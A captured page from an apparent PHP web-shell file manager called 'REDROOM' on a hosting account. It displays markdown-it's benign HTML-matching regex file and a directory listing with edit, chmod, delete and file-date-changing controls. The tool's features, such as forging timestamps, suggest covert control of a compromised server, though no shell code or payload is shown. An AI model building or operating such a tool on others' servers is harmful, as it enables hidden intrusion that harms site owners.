REDROOM
PHP 8.2.30
Path:
Logout
Edit File
Size: 992 B
Close
/home/byroehnu/easepaybiz.easetack.com/node_modules/markdown-it/lib/common/html_re.mjs
Text
Base64
// Regexps to match html elements const attr_name = '[a-zA-Z_:][a-zA-Z0-9:._-]*' const unquoted = '[^"\'=<>`\\x00-\\x20]+' const single_quoted = "'[^']*'" const double_quoted = '"[^"]*"' const attr_value = '(?:' + unquoted + '|' + single_quoted + '|' + double_quoted + ')' const attribute = '(?:\\s+' + attr_name + '(?:\\s*=\\s*' + attr_value + ')?)' const open_tag = '<[A-Za-z][A-Za-z0-9\\-]*' + attribute + '*\\s*\\/?>' const close_tag = '<\\/[A-Za-z][A-Za-z0-9\\-]*\\s*>' const comment = '<!---?>|<!--(?:[^-]|-[^-]|--[^>])*-->' const processing = '<[?][\\s\\S]*?[?]>' const declaration = '<![A-Za-z][^>]*>' const cdata = '<!\\[CDATA\\[[\\s\\S]*?\\]\\]>' const HTML_TAG_RE = new RegExp('^(?:' + open_tag + '|' + close_tag + '|' + comment + '|' + processing + '|' + declaration + '|' + cdata + ')') const HTML_OPEN_CLOSE_TAG_RE = new RegExp('^(?:' + open_tag + '|' + close_tag + ')') export { HTML_TAG_RE, HTML_OPEN_CLOSE_TAG_RE }
Save
Close
Exit & Reset
Text mode: syntax highlighting auto-detects file type.
Directory Contents
Dirs: 0 × Files: 4
Delete Selected
Select All
Select None
Sort:
Name
Size
Modified
Enable drag-to-move
Name
Size
Perms
Modified
Actions
.htaccess
127 B
lr--r--r--
2026-03-14 01:49:12
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
html_blocks.mjs
799 B
lrw-r--r--
2026-03-05 00:20:12
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
html_re.mjs
992 B
lrw-r--r--
2026-03-05 00:20:12
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
utils.mjs
7.71 KB
lrw-r--r--
2026-03-05 00:20:16
Edit
Download
Rename
Chmod
Change Date
Delete
OK
Cancel
recursive
OK
Cancel
recursive
OK
Cancel
Zip Selected
If ZipArchive is unavailable, a
.tar
will be created (no compression).